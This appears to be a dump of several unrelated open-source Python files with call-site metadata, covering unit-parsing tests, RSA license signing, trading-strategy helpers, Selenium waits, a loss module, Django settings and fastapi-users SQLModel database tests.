ezff.interfaces import gulp, qchem\n'), ((34, 29, 34, 86), 'ezff.generate_forcefield', 'ezff.generate_forcefield', (), '', False, 'import ezff\n'), ((45, 18, 45, 115), 'ezff.error_energy', 'ezff.error_energy', (), '', False, 'import ezff\n')] |
dylanwal/unit_parse | dev_files/utils.py | 07a74d43b9f161bd7ad6ef12ab0f362f1bf6a90d | import logging
from testing_func import testing_func, test_logger
from unit_parse import logger, Unit, Q
from unit_parse.utils import *
test_logger.setLevel(logging.DEBUG)
logger.setLevel(logging.DEBUG)
test_split_list = [
# positive control (changes)
[["fish","pig", "cow"], ["f", "is", "h", "pig", "cow"], {"chunks": ["is"]}],
[["fish", Unit("g"), "cow"], ["f", "is", "h", Unit("g"), "cow"], {"chunks": ["is"]}],
[["fishpigcow"], ["f", "i", "shpigcow"], {"chunks": ["i"]}],
[["fishpigcow"], ["f", "i", "shpig", "c", "ow"], {"chunks": ["i", "c"]}],
# negative control (no changes)
[["fish"], ["fish"], {"chunks": ["fish"]}],
[["fishpigcow"], ["fishpigcow"], {"chunks": ["z"]}],
[[Unit("g")], [Unit("g")], {"chunks": ["is"]}],
]
testing_func(split_list, test_split_list)
test_round_off = [ # [Input, Output]
# positive control (works)
[234.2342300000001, 234.23423, {"sig_digit": 15}],
[234.2342399999999999, 234.23424, {"sig_digit": 15}],
[234.2342300000001, 234.23, {"sig_digit": 5}],
[234.2342399999999999, 234.23, {"sig_digit": 5}],
[234.2342399999999999, 200, {"sig_digit": 1}],
[-234.2342399999999999, -200, {"sig_digit": 1}],
[-234.2342399999999999, -234.23424, {"sig_digit": 15}],
# negative control (fails)
]
testing_func(sig_figs, test_round_off)
test_list_depth = [ # [Input, Output]
# positive control (works)
["", 0],
[[], 0],
["asds", 0],
[1, 0],
[["aaa"], 1],
[[["aaa"]], 2],
[[["aaa", "aaa", "aaa"], ["aaa"], ["aaa"]], 2],
[[["aaa", "aaa", "aaa"], ["aaa"], ["aaa"]], 2],
[[[["aaa"], ["aaa"], ["aaa"]]], 3],
# negative control (fails)
]
testing_func(get_list_depth, test_list_depth)
test_remove_empty_cells = [ # [Input, Output]
# positive control (works)
[[], None],
[[""], None],
[["asds"], ["asds"]],
[1, 1],
[["aaa", ""], ["aaa"]],
[["aaa", []], ["aaa"]],
[[["aaa", []]], [["aaa"]]],
[[["aaa", [""]]], [["aaa"]]],
# negative control (fails)
]
testing_func(remove_empty_cells, test_remove_empty_cells)
examples_quantity_difference = [
[Q("5 g"), Q("0.5"), {"quantity2": Q("10 g")}],
[5, 1, {"quantity2": Q("10 g")}],
]
testing_func(quantity_difference, examples_quantity_difference)
| [((7, 0, 7, 35), 'testing_func.test_logger.setLevel', 'test_logger.setLevel', ({(7, 21, 7, 34): 'logging.DEBUG'}, {}), '(logging.DEBUG)', False, 'from testing_func import testing_func, test_logger\n'), ((8, 0, 8, 30), 'unit_parse.logger.setLevel', 'logger.setLevel', ({(8, 16, 8, 29): 'logging.DEBUG'}, {}), '(logging.DEBUG)', False, 'from unit_parse import logger, Unit, Q\n'), ((23, 0, 23, 41), 'testing_func.testing_func', 'testing_func', ({(23, 13, 23, 23): 'split_list', (23, 25, 23, 40): 'test_split_list'}, {}), '(split_list, test_split_list)', False, 'from testing_func import testing_func, test_logger\n'), ((38, 0, 38, 38), 'testing_func.testing_func', 'testing_func', ({(38, 13, 38, 21): 'sig_figs', (38, 23, 38, 37): 'test_round_off'}, {}), '(sig_figs, test_round_off)', False, 'from testing_func import testing_func, test_logger\n'), ((56, 0, 56, 45), 'testing_func.testing_func', 'testing_func', ({(56, 13, 56, 27): 'get_list_depth', (56, 29, 56, 44): 'test_list_depth'}, {}), '(get_list_depth, test_list_depth)', False, 'from testing_func import testing_func, test_logger\n'), ((73, 0, 73, 57), 'testing_func.testing_func', 'testing_func', ({(73, 13, 73, 31): 'remove_empty_cells', (73, 33, 73, 56): 'test_remove_empty_cells'}, {}), '(remove_empty_cells, test_remove_empty_cells)', False, 'from testing_func import testing_func, test_logger\n'), ((81, 0, 81, 63), 'testing_func.testing_func', 'testing_func', ({(81, 13, 81, 32): 'quantity_difference', (81, 34, 81, 62): 'examples_quantity_difference'}, {}), '(quantity_difference, examples_quantity_difference)', False, 'from testing_func import testing_func, test_logger\n'), ((77, 5, 77, 13), 'unit_parse.Q', 'Q', ({(77, 7, 77, 12): '"""5 g"""'}, {}), "('5 g')", False, 'from unit_parse import logger, Unit, Q\n'), ((77, 15, 77, 23), 'unit_parse.Q', 'Q', ({(77, 17, 77, 22): '"""0.5"""'}, {}), "('0.5')", False, 'from unit_parse import logger, Unit, Q\n'), ((14, 14, 14, 23), 'unit_parse.Unit', 'Unit', ({(14, 19, 14, 22): '"""g"""'}, {}), "('g')", False, 'from unit_parse import logger, Unit, Q\n'), ((14, 50, 14, 59), 'unit_parse.Unit', 'Unit', ({(14, 55, 14, 58): '"""g"""'}, {}), "('g')", False, 'from unit_parse import logger, Unit, Q\n'), ((21, 6, 21, 15), 'unit_parse.Unit', 'Unit', ({(21, 11, 21, 14): '"""g"""'}, {}), "('g')", False, 'from unit_parse import logger, Unit, Q\n'), ((21, 19, 21, 28), 'unit_parse.Unit', 'Unit', ({(21, 24, 21, 27): '"""g"""'}, {}), "('g')", False, 'from unit_parse import logger, Unit, Q\n'), ((77, 39, 77, 48), 'unit_parse.Q', 'Q', ({(77, 41, 77, 47): '"""10 g"""'}, {}), "('10 g')", False, 'from unit_parse import logger, Unit, Q\n'), ((79, 25, 79, 34), 'unit_parse.Q', 'Q', ({(79, 27, 79, 33): '"""10 g"""'}, {}), "('10 g')", False, 'from unit_parse import logger, Unit, Q\n')] |
d53dave/python-crypto-licensecheck | genlicense.py | d11612612ea54a5418fd8dbba9212a9c84c56f22 | import sys
from Crypto.Signature import pkcs1_15
from Crypto.Hash import SHA256
from Crypto.PublicKey import RSA
def sign_data(key, data, output_file):
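    """Sign `data` with the RSA private key read from `key` (PKCS#1 v1.5 over SHA-256)
    and write the raw signature bytes to `output_file`."""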
with open(key, 'r', encoding='utf-8') as keyFile:
rsakey = RSA.importKey(keyFile.read())
signer = pkcs1_15.new(rsakey)
digest = SHA256.new(data.encode('utf-8'))
with open(output_file, 'wb') as out:
out.write(signer.sign(digest))
if __name__ == '__main__':
key_file = sys.argv[1]
input_string = sys.argv[2]
out_file = sys.argv[3]
sign_data(key_file, input_string, out_file)
| [((10, 17, 10, 37), 'Crypto.Signature.pkcs1_15.new', 'pkcs1_15.new', ({(10, 30, 10, 36): 'rsakey'}, {}), '(rsakey)', False, 'from Crypto.Signature import pkcs1_15\n')] |
Fractate/freqbot | freqtrade/strategy/informative_decorator.py | 47b35d2320dc97977411454c1466c762d339fdee | from typing import Any, Callable, NamedTuple, Optional, Union
from pandas import DataFrame
from freqtrade.exceptions import OperationalException
from freqtrade.strategy.strategy_helper import merge_informative_pair
PopulateIndicators = Callable[[Any, DataFrame, dict], DataFrame]
class InformativeData(NamedTuple):
asset: Optional[str]
timeframe: str
fmt: Union[str, Callable[[Any], str], None]
ffill: bool
def informative(timeframe: str, asset: str = '',
fmt: Optional[Union[str, Callable[[Any], str]]] = None,
ffill: bool = True) -> Callable[[PopulateIndicators], PopulateIndicators]:
"""
A decorator for populate_indicators_Nn(self, dataframe, metadata), allowing these functions to
define informative indicators.
Example usage:
@informative('1h')
def populate_indicators_1h(self, dataframe: DataFrame, metadata: dict) -> DataFrame:
dataframe['rsi'] = ta.RSI(dataframe, timeperiod=14)
return dataframe
:param timeframe: Informative timeframe. Must always be equal or higher than strategy timeframe.
:param asset: Informative asset, for example BTC, BTC/USDT, ETH/BTC. Do not specify to use
current pair.
:param fmt: Column format (str) or column formatter (callable(name, asset, timeframe)). When not
specified, defaults to:
* {base}_{quote}_{column}_{timeframe} if asset is specified.
* {column}_{timeframe} if asset is not specified.
Format string supports these format variables:
* {asset} - full name of the asset, for example 'BTC/USDT'.
* {base} - base currency in lower case, for example 'eth'.
* {BASE} - same as {base}, except in upper case.
* {quote} - quote currency in lower case, for example 'usdt'.
* {QUOTE} - same as {quote}, except in upper case.
* {column} - name of dataframe column.
* {timeframe} - timeframe of informative dataframe.
:param ffill: ffill dataframe after merging informative pair.
"""
_asset = asset
_timeframe = timeframe
_fmt = fmt
_ffill = ffill
def decorator(fn: PopulateIndicators):
informative_pairs = getattr(fn, '_ft_informative', [])
informative_pairs.append(InformativeData(_asset, _timeframe, _fmt, _ffill))
setattr(fn, '_ft_informative', informative_pairs)
return fn
return decorator
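# Illustrative usage (not part of the original module): with an explicit asset the
# default fmt '{base}_{quote}_{column}_{timeframe}' applies, so the RSI column
# produced below would be named 'btc_usdt_rsi_1h'.
#
#     @informative('1h', 'BTC/USDT')
#     def populate_indicators_btc_1h(self, dataframe: DataFrame, metadata: dict) -> DataFrame:
#         dataframe['rsi'] = ta.RSI(dataframe, timeperiod=14)
#         return dataframe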
def _format_pair_name(config, pair: str) -> str:
return pair.format(stake_currency=config['stake_currency'],
stake=config['stake_currency']).upper()
def _create_and_merge_informative_pair(strategy, dataframe: DataFrame, metadata: dict,
inf_data: InformativeData,
populate_indicators: PopulateIndicators):
asset = inf_data.asset or ''
timeframe = inf_data.timeframe
fmt = inf_data.fmt
config = strategy.config
if asset:
# Insert stake currency if needed.
asset = _format_pair_name(config, asset)
else:
# Not specifying an asset will define informative dataframe for current pair.
asset = metadata['pair']
if '/' in asset:
base, quote = asset.split('/')
else:
# When futures are supported this may need reevaluation.
# base, quote = asset, ''
raise OperationalException('Not implemented.')
# Default format. This optimizes for the common case: informative pairs using same stake
# currency. When quote currency matches stake currency, column name will omit base currency.
# This allows easily reconfiguring strategy to use different base currency. In a rare case
# where it is desired to keep quote currency in column name at all times user should specify
# fmt='{base}_{quote}_{column}_{timeframe}' format or similar.
if not fmt:
fmt = '{column}_{timeframe}' # Informatives of current pair
if inf_data.asset:
fmt = '{base}_{quote}_' + fmt # Informatives of other pairs
inf_metadata = {'pair': asset, 'timeframe': timeframe}
inf_dataframe = strategy.dp.get_pair_dataframe(asset, timeframe)
inf_dataframe = populate_indicators(strategy, inf_dataframe, inf_metadata)
formatter: Any = None
if callable(fmt):
formatter = fmt # A custom user-specified formatter function.
else:
formatter = fmt.format # A default string formatter.
fmt_args = {
'BASE': base.upper(),
'QUOTE': quote.upper(),
'base': base.lower(),
'quote': quote.lower(),
'asset': asset,
'timeframe': timeframe,
}
inf_dataframe.rename(columns=lambda column: formatter(column=column, **fmt_args),
inplace=True)
date_column = formatter(column='date', **fmt_args)
if date_column in dataframe.columns:
raise OperationalException(f'Duplicate column name {date_column} exists in '
f'dataframe! Ensure column names are unique!')
dataframe = merge_informative_pair(dataframe, inf_dataframe, strategy.timeframe, timeframe,
ffill=inf_data.ffill, append_timeframe=False,
date_column=date_column)
return dataframe
| [((125, 16, 127, 63), 'freqtrade.strategy.strategy_helper.merge_informative_pair', 'merge_informative_pair', (), '', False, 'from freqtrade.strategy.strategy_helper import merge_informative_pair\n'), ((88, 14, 88, 54), 'freqtrade.exceptions.OperationalException', 'OperationalException', ({(88, 35, 88, 53): '"""Not implemented."""'}, {}), "('Not implemented.')", False, 'from freqtrade.exceptions import OperationalException\n'), ((123, 14, 124, 81), 'freqtrade.exceptions.OperationalException', 'OperationalException', ({(123, 35, 124, 80): 'f"""Duplicate column name {date_column} exists in dataframe! Ensure column names are unique!"""'}, {}), "(\n f'Duplicate column name {date_column} exists in dataframe! Ensure column names are unique!'\n )", False, 'from freqtrade.exceptions import OperationalException\n')] |
VeirichR/curso-python-selenium | codigo_das_aulas/aula_09/aula_09_03.py | 9b9107a64adb4e6bcf10c76287e0b4cc7d024321 | from functools import partial
from selenium.webdriver import Firefox
from selenium.webdriver.support.ui import (
WebDriverWait
)
def esperar_elemento(elemento, webdriver):
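    """Return True once at least one element matches the CSS selector `elemento`;
    used as a WebDriverWait condition below."""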
    print(f'Trying to find "{elemento}"')
if webdriver.find_elements_by_css_selector(elemento):
return True
return False
esperar_botao = partial(esperar_elemento, 'button')
esperar_sucesso = partial(esperar_elemento, '#finished')
url = 'https://selenium.dunossauro.live/aula_09_a.html'
driver = Firefox()
wdw = WebDriverWait(driver, 10)
driver.get(url)
wdw.until(esperar_botao, 'Something went wrong')
driver.find_element_by_css_selector('button').click()
wdw.until(
esperar_sucesso,
    'The success message did not appear'
)
sucesso = driver.find_element_by_css_selector('#finished')
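# The page renders its status text in Portuguese; 'Carregamento concluído' means "Loading finished".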
assert sucesso.text == 'Carregamento concluído'
| [((15, 16, 15, 51), 'functools.partial', 'partial', ({(15, 24, 15, 40): 'esperar_elemento', (15, 42, 15, 50): '"""button"""'}, {}), "(esperar_elemento, 'button')", False, 'from functools import partial\n'), ((16, 18, 16, 56), 'functools.partial', 'partial', ({(16, 26, 16, 42): 'esperar_elemento', (16, 44, 16, 55): '"""#finished"""'}, {}), "(esperar_elemento, '#finished')", False, 'from functools import partial\n'), ((20, 9, 20, 18), 'selenium.webdriver.Firefox', 'Firefox', ({}, {}), '()', False, 'from selenium.webdriver import Firefox\n'), ((22, 6, 22, 31), 'selenium.webdriver.support.ui.WebDriverWait', 'WebDriverWait', ({(22, 20, 22, 26): 'driver', (22, 28, 22, 30): '10'}, {}), '(driver, 10)', False, 'from selenium.webdriver.support.ui import WebDriverWait\n')] |
irom-lab/RL_Generalization | prae/losses.py | 82add6898ee2e962a3aa5efedf80821a013eae7f | import torch
from torch import nn
from prae.distances import square_dist, HingedSquaredEuclidean
class Loss(nn.Module):
    """
    Combined transition, reward and negative-sampling loss.
    """
    def __init__(self, hinge, neg=True, rew=True):
        """
        hinge: margin (eps) of the hinged squared-Euclidean distance used for negatives.
        neg: if False, the negative-sampling term is disabled.
        rew: if False, the reward term is disabled.
        """
super().__init__()
self.reward_loss = square_dist
# If False, no negative sampling
self.neg = neg
# If False, no reward loss
self.rew = rew
self.distance = HingedSquaredEuclidean(eps=hinge)
    def forward(self, z_c, z_l, z_n, z_f, r, r_e):
        """
        Return (transition_loss, reward_loss, negative_loss).
        z_n and z_l are compared for the transition term, r and r_e for the
        reward term, and z_f provides the negative samples; z_c is only used
        for the batch size.
        """
# Transition loss
transition_loss = self.distance.distance(z_n, z_l).mean()
# Reward loss
if self.rew:
reward_loss = 0.5 * self.reward_loss(r, r_e).mean()
else:
reward_loss = torch.zeros_like(transition_loss)
        # Negative loss
if self.neg:
z_n = tile(z_n, z_f)
batch_size = z_c.shape[0]
negative_loss = self.distance.negative_distance(z_n, z_f).sum()/batch_size
else:
negative_loss = torch.zeros_like(transition_loss)
return transition_loss, reward_loss, negative_loss
def tile(embedding, example):
    """
    Repeat each row of `embedding` so its batch dimension matches `example`.
    """
n = example.shape[0]//embedding.shape[0]
embedding = embedding.unsqueeze(1).repeat(1, n, 1)
embedding = squeeze_embedding(embedding)
return embedding
def squeeze_embedding(x):
    """
    Flatten a (batch, n, dim) tensor to (batch * n, dim).
    """
b, n, d = x.shape
x = x.reshape(b*n, d)
return x
| [((18, 24, 18, 57), 'prae.distances.HingedSquaredEuclidean', 'HingedSquaredEuclidean', (), '', False, 'from prae.distances import square_dist, HingedSquaredEuclidean\n'), ((30, 26, 30, 59), 'torch.zeros_like', 'torch.zeros_like', ({(30, 43, 30, 58): 'transition_loss'}, {}), '(transition_loss)', False, 'import torch\n'), ((40, 28, 40, 61), 'torch.zeros_like', 'torch.zeros_like', ({(40, 45, 40, 60): 'transition_loss'}, {}), '(transition_loss)', False, 'import torch\n')] |
isathish/ai_opesource | orion/modules/active/wolfram.py | cdccd882306c45712fcdd40e15937b5a9571028a | """
Handles most general questions (including math!)
Requires:
- WolframAlpha API key
Usage Examples:
- "How tall is Mount Everest?"
- "What is the derivative of y = 2x?"
"""
import wolframalpha
from orion.classes.module import Module
from orion.classes.task import ActiveTask
from orion import settings
wolfram_client = wolframalpha.Client(settings.WOLFRAM_KEY)
class AnswerTask(ActiveTask):
def match(self, text):
return True
def action(self, text):
try:
query = wolfram_client.query(text)
self.speak(next(query.results).text)
        except Exception:  # no result returned or the API request failed
self.speak(settings.NO_MODULES)
class Wolfram(Module):
def __init__(self):
tasks = [AnswerTask()]
super(Wolfram, self).__init__('wolfram', tasks, priority=0)
| [((18, 17, 18, 58), 'wolframalpha.Client', 'wolframalpha.Client', ({(18, 37, 18, 57): 'settings.WOLFRAM_KEY'}, {}), '(settings.WOLFRAM_KEY)', False, 'import wolframalpha\n')] |
linuxdaemon/poly-match | polymatch/matchers/standard.py | 66d967999de982d5ee9463c46b0ff8040d91dc67 | from polymatch import PolymorphicMatcher
class ExactMatcher(PolymorphicMatcher):
def compile_pattern(self, raw_pattern):
return raw_pattern
def compile_pattern_cs(self, raw_pattern):
return raw_pattern
def compile_pattern_ci(self, raw_pattern):
return raw_pattern.lower()
def compile_pattern_cf(self, raw_pattern):
return raw_pattern.casefold()
def match_text(self, pattern, text):
return text == pattern
@classmethod
def get_type(cls):
return "exact"
class ContainsMatcher(PolymorphicMatcher):
def compile_pattern(self, raw_pattern):
return raw_pattern
def compile_pattern_cs(self, raw_pattern):
return raw_pattern
def compile_pattern_ci(self, raw_pattern):
return raw_pattern.lower()
def compile_pattern_cf(self, raw_pattern):
return raw_pattern.casefold()
def match_text(self, pattern, text):
return pattern in text
@classmethod
def get_type(cls):
return "contains"
| [] |
carthage-college/django-djcorsche | djcorsche/settings_default.py | c43db6e634f5b3fc9c8b0cff80ced8382ca6643c | """
Django settings for project.
"""
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
import os
# Debug
#DEBUG = False
DEBUG = True
TEMPLATE_DEBUG = DEBUG
INFORMIX_DEBUG = "debug"
ADMINS = (
('', ''),
)
MANAGERS = ADMINS
SECRET_KEY = ''
ALLOWED_HOSTS = []
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'America/Chicago'
SITE_ID = 1
USE_I18N = False
USE_L10N = False
USE_TZ = False
DEFAULT_CHARSET = 'utf-8'
FILE_CHARSET = 'utf-8'
SERVER_URL = ""
API_URL = "%s/%s" % (SERVER_URL, "api")
LIVEWHALE_API_URL = "https://%s" % (SERVER_URL)
BASE_DIR = os.path.dirname(os.path.dirname(__file__))
ROOT_DIR = os.path.dirname(__file__)
ROOT_URL = "/djskeletor/"
ROOT_URLCONF = 'djskeletor.core.urls'
WSGI_APPLICATION = 'djskeletor.wsgi.application'
MEDIA_ROOT = ''
ADMIN_MEDIA_PREFIX = '/static/admin/'
STATIC_ROOT = ''
STATIC_URL = "/static/"
STATICFILES_DIRS = ()
STATICFILES_FINDERS = (
'django.contrib.staticfiles.finders.FileSystemFinder',
'django.contrib.staticfiles.finders.AppDirectoriesFinder',
# 'django.contrib.staticfiles.finders.DefaultStorageFinder',
)
DATABASES = {
'default': {
'HOST': '127.0.0.1',
'PORT': '3306',
'NAME': 'django_djskeletor',
'ENGINE': 'django.db.backends.mysql',
#'ENGINE': 'django.db.backends.dummy',
'USER': '',
'PASSWORD': ''
},
}
INSTALLED_APPS = (
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.formtools',
'django.contrib.humanize',
'django.contrib.messages',
'django.contrib.sessions',
'django.contrib.sites',
'django.contrib.staticfiles',
'djskeletor',
'djskeletor.core',
'djskeletor.myapp',
'djtools',
)
MIDDLEWARE_CLASSES = (
'django.middleware.cache.UpdateCacheMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.cache.FetchFromCacheMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
# the following should be uncommented unless you are
# embedding your apps in iframes
#'django.middleware.clickjacking.XFrameOptionsMiddleware',
)
# template stuff
TEMPLATE_LOADERS = (
'django.template.loaders.filesystem.Loader',
'django.template.loaders.app_directories.Loader',
)
TEMPLATE_DIRS = (
"/data2/django_projects/djskeletor/templates/",
"/data2/django_templates/djkorra/",
"/data2/django_templates/djcher/",
"/data2/django_templates/",
)
TEMPLATE_CONTEXT_PROCESSORS = (
"djtools.context_processors.sitevars",
"django.contrib.auth.context_processors.auth",
"django.core.context_processors.request",
"django.core.context_processors.debug",
"django.core.context_processors.media",
)
# caching
CACHES = {
'default': {
'BACKEND': 'django.core.cache.backends.dummy.DummyCache',
#'BACKEND': 'django.core.cache.backends.memcached.MemcachedCache',
#'LOCATION': '127.0.0.1:11211',
#'BACKEND': 'django.core.cache.backends.filebased.FileBasedCache',
#'LOCATION': '/var/tmp/django_djskeletor_cache',
#'TIMEOUT': 60*20,
#'KEY_PREFIX': "DJSKELETOR_",
#'OPTIONS': {
# 'MAX_ENTRIES': 80000,
#}
}
}
CACHE_MIDDLEWARE_ANONYMOUS_ONLY = True
# LDAP Constants
LDAP_SERVER = ''
LDAP_SERVER_PWM = ''
LDAP_PORT = ''
LDAP_PORT_PWM = ''
LDAP_PROTOCOL = ""
LDAP_PROTOCOL_PWM = ""
LDAP_BASE = ""
LDAP_USER = ""
LDAP_PASS = ""
LDAP_EMAIL_DOMAIN = ""
LDAP_OBJECT_CLASS = ""
LDAP_OBJECT_CLASS_LIST = []
LDAP_GROUPS = {}
LDAP_RETURN = []
LDAP_RETURN_PWM = []
LDAP_ID_ATTR = ""
LDAP_CHALLENGE_ATTR = ""
# auth backends
AUTHENTICATION_BACKENDS = (
'djauth.ldapBackend.LDAPBackend',
'django.contrib.auth.backends.ModelBackend',
)
LOGIN_URL = '/djskeletor/accounts/login/'
LOGIN_REDIRECT_URL = '/djskeletor/'
USE_X_FORWARDED_HOST = True
#SESSION_ENGINE = "django.contrib.sessions.backends.cache"
SESSION_EXPIRE_AT_BROWSER_CLOSE = False
SESSION_COOKIE_DOMAIN = ".carthage.edu"
SESSION_COOKIE_NAME = 'django_djskeletor_cookie'
SESSION_COOKIE_AGE = 86400
# SMTP settings
EMAIL_HOST = ''
EMAIL_HOST_USER = ''
EMAIL_HOST_PASSWORD = ''
EMAIL_USE_TLS = True
EMAIL_PORT = 587
EMAIL_FAIL_SILENTLY = False
DEFAULT_FROM_EMAIL = ''
SERVER_EMAIL = ''
SERVER_MAIL = ''
# logging
LOG_FILEPATH = os.path.join(os.path.dirname(__file__), "logs/")
LOG_FILENAME = LOG_FILEPATH + "debug.log"
LOGGING = {
'version': 1,
'disable_existing_loggers': True,
'formatters': {
'standard': {
'format' : "[%(asctime)s] %(levelname)s [%(name)s:%(lineno)s] %(message)s",
'datefmt' : "%Y/%b/%d %H:%M:%S"
},
'verbose': {
'format': '%(levelname)s %(asctime)s %(module)s %(process)d %(thread)d %(message)s',
'datefmt' : "%Y/%b/%d %H:%M:%S"
},
'simple': {
'format': '%(levelname)s %(message)s'
},
},
'filters': {
'require_debug_false': {
'()': 'django.utils.log.RequireDebugFalse'
}
},
'handlers': {
'null': {
'level':'DEBUG',
'class':'django.utils.log.NullHandler',
},
'logfile': {
'level':'DEBUG',
'class':'logging.handlers.RotatingFileHandler',
'filename': LOG_FILENAME,
'maxBytes': 50000,
'backupCount': 2,
'formatter': 'standard',
},
'console':{
'level':'INFO',
'class':'logging.StreamHandler',
'formatter': 'standard'
},
'mail_admins': {
'level': 'ERROR',
'filters': ['require_debug_false'],
'include_html': True,
'class': 'django.utils.log.AdminEmailHandler'
}
},
'loggers': {
'djskeletor': {
'handlers':['logfile'],
'propagate': True,
'level':'DEBUG',
},
'django': {
'handlers':['console'],
'propagate': True,
'level':'WARN',
},
'django.db.backends': {
'handlers': ['console'],
'level': 'DEBUG',
'propagate': False,
},
'django.request': {
'handlers': ['mail_admins'],
'level': 'ERROR',
'propagate': True,
},
}
}
| [((33, 11, 33, 36), 'os.path.dirname', 'os.path.dirname', ({(33, 27, 33, 35): '__file__'}, {}), '(__file__)', False, 'import os\n'), ((32, 27, 32, 52), 'os.path.dirname', 'os.path.dirname', ({(32, 43, 32, 51): '__file__'}, {}), '(__file__)', False, 'import os\n'), ((166, 28, 166, 53), 'os.path.dirname', 'os.path.dirname', ({(166, 44, 166, 52): '__file__'}, {}), '(__file__)', False, 'import os\n')] |
AaronYang2333/CSCI_570 | records/12-09/ffff.py | 03e34ce5ff192fc94612bc3afb51dcab3e854462 | __author__ = 'Aaron Yang'
__email__ = '[email protected]'
__date__ = '12/9/2020 4:18 PM'
from abc import abstractmethod
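# Note: these classes do not inherit from abc.ABC / use ABCMeta, so @abstractmethod is
# not enforced at instantiation time; Product and Factory stay instantiable and their
# default implementations remain callable (Factory().produce() below relies on this).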
class Product(object):
@abstractmethod
def setMsg(self, msg="default info"):
self.msg = msg
@abstractmethod
def info(self):
print(self.msg)
class DefaultObj(Product):
def __init__(self):
super().setMsg()
class Factory(object):
@abstractmethod
def produce(self):
return DefaultObj()
class PC(Product):
def __init__(self):
self.setMsg('pc info')
class LAPTOP(Product):
def __init__(self):
self.setMsg('laptop info')
class PCFactory(Factory):
def produce(self):
return PC()
class LAPTOPFactory(Factory):
def produce(self):
return LAPTOP()
if __name__ == '__main__':
ss = Factory().produce()
pc = PCFactory().produce()
laptop = LAPTOPFactory().produce()
pc.info()
laptop.info()
ss.info()
| [] |
fastapi-users/fastapi-users-db-sqlmodel | tests/test_users.py | 3a46b80399f129aa07a834a1b40bf49d08c37be1 | import uuid
from typing import AsyncGenerator
import pytest
from sqlalchemy import exc
from sqlalchemy.ext.asyncio import AsyncSession, create_async_engine
from sqlalchemy.orm import sessionmaker
from sqlmodel import Session, SQLModel, create_engine
from fastapi_users_db_sqlmodel import (
NotSetOAuthAccountTableError,
SQLModelUserDatabase,
SQLModelUserDatabaseAsync,
)
from tests.conftest import OAuthAccount, UserDB, UserDBOAuth
safe_uuid = uuid.UUID("a9089e5d-2642-406d-a7c0-cbc641aca0ec")
async def init_sync_session(url: str) -> AsyncGenerator[Session, None]:
engine = create_engine(url, connect_args={"check_same_thread": False})
SQLModel.metadata.create_all(engine)
with Session(engine) as session:
yield session
SQLModel.metadata.drop_all(engine)
async def init_async_session(url: str) -> AsyncGenerator[AsyncSession, None]:
engine = create_async_engine(url, connect_args={"check_same_thread": False})
make_session = sessionmaker(engine, class_=AsyncSession, expire_on_commit=False)
async with engine.begin() as conn:
await conn.run_sync(SQLModel.metadata.create_all)
async with make_session() as session:
yield session
await conn.run_sync(SQLModel.metadata.drop_all)
@pytest.fixture(
params=[
(init_sync_session, "sqlite:///./test-sqlmodel-user.db", SQLModelUserDatabase),
(
init_async_session,
"sqlite+aiosqlite:///./test-sqlmodel-user.db",
SQLModelUserDatabaseAsync,
),
],
ids=["sync", "async"],
)
async def sqlmodel_user_db(request) -> AsyncGenerator[SQLModelUserDatabase, None]:
create_session = request.param[0]
database_url = request.param[1]
database_class = request.param[2]
async for session in create_session(database_url):
yield database_class(UserDB, session)
@pytest.fixture(
params=[
(
init_sync_session,
"sqlite:///./test-sqlmodel-user-oauth.db",
SQLModelUserDatabase,
),
(
init_async_session,
"sqlite+aiosqlite:///./test-sqlmodel-user-oauth.db",
SQLModelUserDatabaseAsync,
),
],
ids=["sync", "async"],
)
async def sqlmodel_user_db_oauth(request) -> AsyncGenerator[SQLModelUserDatabase, None]:
create_session = request.param[0]
database_url = request.param[1]
database_class = request.param[2]
async for session in create_session(database_url):
yield database_class(UserDBOAuth, session, OAuthAccount)
@pytest.mark.asyncio
@pytest.mark.db
async def test_queries(sqlmodel_user_db: SQLModelUserDatabase[UserDB, OAuthAccount]):
user = UserDB(
id=safe_uuid,
email="[email protected]",
hashed_password="guinevere",
)
# Create
user_db = await sqlmodel_user_db.create(user)
assert user_db.id is not None
assert user_db.is_active is True
assert user_db.is_superuser is False
assert user_db.email == user.email
# Update
user_db.is_superuser = True
await sqlmodel_user_db.update(user_db)
# Get by id
id_user = await sqlmodel_user_db.get(user.id)
assert id_user is not None
assert id_user.id == user_db.id
assert id_user.is_superuser is True
# Get by email
email_user = await sqlmodel_user_db.get_by_email(str(user.email))
assert email_user is not None
assert email_user.id == user_db.id
# Get by uppercased email
email_user = await sqlmodel_user_db.get_by_email("[email protected]")
assert email_user is not None
assert email_user.id == user_db.id
# Unknown user
unknown_user = await sqlmodel_user_db.get_by_email("[email protected]")
assert unknown_user is None
# Delete user
await sqlmodel_user_db.delete(user)
deleted_user = await sqlmodel_user_db.get(user.id)
assert deleted_user is None
# Exception when trying to get by OAuth account
with pytest.raises(NotSetOAuthAccountTableError):
await sqlmodel_user_db.get_by_oauth_account("foo", "bar")
@pytest.mark.asyncio
@pytest.mark.db
async def test_insert_existing_email(
sqlmodel_user_db: SQLModelUserDatabase[UserDB, OAuthAccount]
):
user = UserDB(
id=safe_uuid,
email="[email protected]",
hashed_password="guinevere",
)
await sqlmodel_user_db.create(user)
with pytest.raises(exc.IntegrityError):
await sqlmodel_user_db.create(
UserDB(id=safe_uuid, email=user.email, hashed_password="guinevere")
)
@pytest.mark.asyncio
@pytest.mark.db
async def test_insert_non_nullable_fields(
sqlmodel_user_db: SQLModelUserDatabase[UserDB, OAuthAccount]
):
with pytest.raises(exc.IntegrityError):
wrong_user = UserDB(
id=safe_uuid, email="[email protected]", hashed_password="aaa"
)
wrong_user.email = None # type: ignore
await sqlmodel_user_db.create(wrong_user)
@pytest.mark.asyncio
@pytest.mark.db
async def test_queries_custom_fields(
sqlmodel_user_db: SQLModelUserDatabase[UserDB, OAuthAccount],
):
"""It should output custom fields in query result."""
user = UserDB(
id=safe_uuid,
email="[email protected]",
hashed_password="guinevere",
first_name="Lancelot",
)
await sqlmodel_user_db.create(user)
id_user = await sqlmodel_user_db.get(user.id)
assert id_user is not None
assert id_user.id == user.id
assert id_user.first_name == user.first_name
@pytest.mark.asyncio
@pytest.mark.db
async def test_queries_oauth(
